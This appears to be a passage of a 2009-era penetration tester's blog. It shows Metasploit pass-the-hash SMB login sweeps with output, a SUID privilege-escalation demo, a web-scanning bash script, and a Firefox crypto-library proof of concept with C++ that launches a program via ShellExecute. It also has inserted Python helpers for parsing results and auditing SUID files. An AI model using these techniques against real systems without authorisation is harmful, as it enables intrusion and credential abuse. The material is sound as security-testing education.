so… you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check & see which systems use the same hashes:

msf exploit(psexec) > use scanner/smb/login
msf auxiliary(login) > info

Name: SMB Login Check Scanner
Version: 0
License: Metasploit Framework License (BSD)

Provided by:
tebo <tebo@attackresearch.com>

Basic options:
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOSTS                      yes       The target address range or CIDR identifier
RPORT      445              yes       Set the SMB service port
SMBDomain  WORKGROUP        no        SMB Domain
SMBPass                     no        SMB Password
SMBUser    Administrator    no        SMB Username
THREADS    1                yes       The number of concurrent threads

Description:
This module will test a SMB login on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.

msf auxiliary(login) > set RHOSTS 10.1.1.0/24
RHOSTS => 10.1.1.0/24
msf auxiliary(login) > set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)
SMBPass => XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
msf auxiliary(login) > exploit
[*] 10.1.1.6 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 10.1.1.21 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 - SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
[*] 10.1.1.29 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.29
[*] 10.1.1.28 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.28
[*] 10.1.1.31 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)
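An added Python helper (not from the original post and not part of Metasploit) that turns the module output above into the actual finding: the set of hosts that all accept one password hash, grouped by OS, plus the hosts whose result was lost to a module error. The sample output, the regexes and the line formats they assume are mine, modelled on the run shown here.

```python
import re
from collections import defaultdict

# Constructed sample of scanner/smb/login output, modelled on the run above.
SAMPLE_OUTPUT = """\
[*] 10.1.1.6 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 10.1.1.21 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 - SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
[*] 10.1.1.29 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] 10.1.1.31 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)
[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked
"""

# The separator may come through as "-" or an en-dash depending on how the log was copied.
SUCCESS_RE = re.compile(r"^\[\*\] (\S+) [-\u2013] SUCCESSFUL LOGIN \((.+)\)$")
FAILED_RE = re.compile(r"^\[\*\] (\S+) [-\u2013] FAILED (0x[0-9a-fA-F]+) [-\u2013] (\S+)$")
ERROR_RE = re.compile(r"^\[\*\] Error: (\S+): (.+)$")


def parse_smb_login(output):
    """Return (accepted, rejected, errors): hosts that accepted the hash with
    their OS string, hosts that rejected it with (ntstatus, name), and hosts
    whose result was lost to a module error."""
    accepted, rejected, errors = {}, {}, {}
    for line in output.splitlines():
        if m := SUCCESS_RE.match(line):
            accepted[m.group(1)] = m.group(2)
        elif m := FAILED_RE.match(line):
            rejected[m.group(1)] = (m.group(2).lower(), m.group(3))
        elif m := ERROR_RE.match(line):
            errors[m.group(1)] = m.group(2)
    return accepted, rejected, errors


def shared_credential_report(output):
    """Every host in `accepted` authenticated the same hash, i.e. shares a
    local account password: that is the finding to report, grouped by OS.
    Hosts that errored were never really tested and need a rerun (fewer THREADS)."""
    accepted, rejected, errors = parse_smb_login(output)
    by_os = defaultdict(list)
    for host, os_name in accepted.items():
        by_os[os_name].append(host)
    return {
        "hosts_sharing_hash": sorted(accepted),
        "by_os": dict(by_os),
        "rejected": rejected,
        "rescan": sorted(errors),
    }
```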

To speed it up, set THREADS > 1. Be careful not to set it too high:

[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO "hosts" ("address", "name", "comm", "os_lang", "mac", "os_sp", "arch", "os_flavor", "address6", "os_name", "desc", "created", "state") VALUES('10.1.1.189', NULL, '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '2009-11-06 10:48:09', 'unknown')

Thanks to tebo for the excellent work. Now, if only it worked with credcollect.

so you have some windows creds, and you want to check if they’re valid or not. turns out there’s a bunch of ways to do this:

1) auxiliary/scanner/smb/login
2) db_autopwn -m
3) msfcli scripting
4) sussuro’s method (python scripting through xmlrpc)

others?

just had a quick refresher on exploiting suid bits (and why they’re so darn evil):

jcran@aldatmak:/usr/bin$ ls -la id
-rwxr-xr-x 1 root root 35232 2008-06-26 20:31 id

jcran@aldatmak:/usr/bin$ id
uid=1000(jcran) gid=1000(jcran) groups=30(dip),127(vboxusers),1000(jcran)

jcran@aldatmak:/usr/bin$ sudo chmod u+s id

jcran@aldatmak:/usr/bin$ ls -la id
-rwxr-xr-x 1 root root 35232 2008-06-26 20:31 id

jcran@aldatmak:/usr/bin$ id
uid=1000(jcran) gid=1000(jcran) euid=0(root) groups=30(dip),127(vboxusers),1000(jcran)

jcran@aldatmak:/usr/bin$ sudo chmod u-s id

The first time it’s executed (no suid bit) – the euid is 1000, jcran. the second time, after the suid bit has been set, i’m effectively root.

finding all suid binaries on a system:

find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -lg {} \;

note, this technique doesn’t work on bash if it’s been set SUID.
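An added Python audit (not the page's code) that applies the same setuid/setgid test as the find command above, but against a baseline of expected privileged binaries, so a freshly set bit like the id example stands out; BASELINE and SAMPLE_ENTRIES are constructed, and walk_filesystem() is the helper for feeding a live system into it.

```python
import os
import stat

# Baseline of SUID/SGID binaries expected on this host (constructed sample;
# a real baseline is taken from a freshly built, trusted image).
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su"}


def privileged_bits(mode):
    """Which of the setuid/setgid bits are set in a stat mode,
    the same test as find's -perm -04000 / -perm -02000."""
    bits = []
    if mode & stat.S_ISUID:
        bits.append("suid")
    if mode & stat.S_ISGID:
        bits.append("sgid")
    return bits


def audit_entries(entries, baseline=BASELINE):
    """entries: iterable of (path, mode, uid). Flags every setuid/setgid file
    not in the baseline; a root-owned SUID file is the case that hands out
    euid=0 to whoever runs it, so it is ranked first."""
    findings = []
    for path, mode, uid in entries:
        bits = privileged_bits(mode)
        if not bits or path in baseline:
            continue
        severity = "high" if uid == 0 and "suid" in bits else "medium"
        findings.append({"path": path, "bits": bits, "severity": severity})
    findings.sort(key=lambda f: (f["severity"] != "high", f["path"]))
    return findings


def walk_filesystem(root="/"):
    """Yield (path, mode, uid) for regular files under root, skipping
    symlinks and unreadable entries, for feeding into audit_entries()."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode, st.st_uid


# Constructed sample: /usr/bin/id with u+s set, as in the session above.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),   # in baseline, expected
    ("/usr/bin/id", 0o104755, 0),       # chmod u+s id -> unexpected root SUID
    ("/usr/bin/ls", 0o100755, 0),       # plain executable, ignored
    ("/usr/bin/wall", 0o102755, 0),     # sgid, not in baseline
]
```

On a live box, `audit_entries(walk_filesystem())` gives the same list the find command prints, minus everything you already expect.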

if an app crashes on the internet, and no one is around to hear it....

is there room for it?

after reading this post on the metasploit blog, i started thinking about how well I currently evaluate product implementations within a typical penetration test. If configuration auditing has been included, I’ll do some of this. However, as a pentester, it pays to know the products in use, and to be familiar with the differences between say, trend micro and kaspersky antivirus or Splunk and syslog. It would be useful to include specific measurements and recommendations around the products in use on the network.

for instance:

  • Antivirus: Trend Micro – Configured properly, managed well. Recently garnered the top spot in an
  • Spam filtering: Ironport – Not well configured. Recommend moving to the Sophos appliance for ease of use. (based on strengths of the team)
  • Monitoring: Snort – Configured poorly. Recommend switching to bro to support policy / functionality separation. would streamline IT processes
  • Vuln scanning: Nessus – AdHoc – Need to move to automated process, more advanced web-scanning tool. Look into qualys / ncircle / rapid7.
  • Firewall: Cisco PIX
  • Logging: Syslog server – …
  • etc..

Now, the issue becomes two-fold. one, the tester needs to have a solid understanding of each of the products he’s evaluating / recommending, and two, a clear understanding of the client’s needs. It’s not a typical penetration test function, but would definitely provide value to a customer. (The more i write here, the more it turns into a full configuration audit of the customer’s systems, and while that would be a nice-to-have on a pentest, it isn’t part of a typical assessment)

i think most shops steer clear of this under the ‘product agnostic’ label, but as long as that’s been made clear up front, i’d say go for it.

i love tools with personality:

Caught exit of DirBuster
Writing report
Report saved to 192.168.254.8.dirbuster.html
Enjoy the rest of your day

The compilation process of nmap comes to mind:

a sneezing dragon

awesome

as does KARMA:

Loading config file etc/karma-scan.xml
DNS-SERVER is running
DHCP-SERVER is running
Delivering judicious KARMA, hit Control-C to quit.

Others?

#!/bin/bash
#webservercheck.sh
while read -r i  ## for all lines (one host per line) in the file provided to the script
do
    [ -z "$i" ] && continue  ## skip blank lines
    echo "Nikto'ing $i"
    ##NOTE: Nikto needs to have been untarred here.
    /home/jcran/toolkit/nix/attack-net-webserver/nikto/nikto.pl -host "$i" -config /home/jcran/toolkit/nix/attack-net-webserver/nikto/config.txt | tee "report.nikto.$i.txt"

    ## Wget: mirror two levels deep
    echo "wgett'ing http://$i/"
    wget -r -l 2 "http://$i/"

    ## dirbuster
    java -jar /home/jcran/toolkit/nix/brute-web/DirBuster-0.12/DirBuster-0.12.jar -H -l /home/jcran/toolkit/wordlist/directory-list-2.3-tiny.txt -e asp,aspx,jsp -v -P -R -r "$i.dirbuster.html" -u "http://$i"
done < "$1"

Call it as: ./webservercheck.sh <file with ips>

Ignore the awful pathing problems if you can. Anyhow, it does a nikto / wget / dirbuster for every host. handy if you’ve run a portscan on :80 (using something like nmap or propecia).

jcran

Doing a little research on an exploit, i came across SecurityDot.Net. Google provided the link. However, when i clicked on it, i got this:

Of the 174 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-09-11, and the last time suspicious content was found on this site was on 2009-09-11. Malicious software includes 2 trojan(s), 1 exploit(s). Successful infection resulted in an average of 3 new process(es) on the target machine.

Malicious software is hosted on 5 domain(s), including odile-marco.com/, google-analyze.org/, 213.163.89.0/.

This site was hosted on 1 network(s) including AS25220 (GLOBALNOC).

Also, when i tried to browse to the site directly, i got this:

Which turns out to be a built-in interface for the same google-stopbadware database.

Note that it was indeed a drive-by attack site. But is it google’s job to protect me when i click on a malicious link?

This is a handy way to execute code within the browser. Kudos to Jesse Ruderman and Dan Kaminsky for the bug discovery and POC.

Essentially, in Firefox up through 3.0.13 (my ubuntu 9.04 is running 3.0.11), there’s a publicly exposed javascript function which allows you to call an arbitrary crypto library on the system. Assuming you’re able to place a malicious library (see below) in the target environment, you could use this to get other systems to execute it. Extra win, you can use UNC paths to locate the library :)

Source is here. <-- note, this is live, but it’s calling a non-existent crypto library.

The malicious library would need a function named CpkunkcsApp(), which, in this case, just calls ShellExecute.

#include <windows.h>
#include <cstring>

// The constructor the library has to provide; it converts the path to a
// wide string and hands it to ShellExecute, which is all the POC does.
class CpkunkcsApp {
public:
    CpkunkcsApp();
};

CpkunkcsApp::CpkunkcsApp()
{
    const char *str = "c:\\windows\\system32\\calc.exe";
    size_t len = strlen(str) + 1;                 // count the terminating NUL
    wchar_t *wText = new wchar_t[len];            // original allocated strlen(str): one wchar_t short of the memset below
    memset(wText, 0, len * sizeof(wchar_t));
    ::MultiByteToWideChar(CP_ACP, 0, str, -1, wText, (int)len);
    ShellExecuteW(NULL, NULL, wText, NULL, NULL, SW_SHOW);
    delete[] wText;
}

I followed Scott Hanselman around for a year when I was touring with the Dead^W^W^W^W a build / team system admin. He always puts out a good utils list: http://www.hanselman.com/blog/ScottHanselmans2009UltimateDeveloperAndPowerUsersToolListForWindows.aspx

There are a few that are already in the pentesting toolkit:

  •  Fiddler
  •  PowerShell
  •  .NET Reflector / NDepend
  •  Notepad++
  •  Firebug

And a few new ones

  •  Storm
  •  BugShooting (Works with trac?)
  •  WinCheat
  •  TextCrawler
  •  PInvoke.NET
  •  Microsoft Network Monitor 3.3

etc etc etc. lots of good stuff here. (i’m learning to blog when i’m procrastinating. back to work!)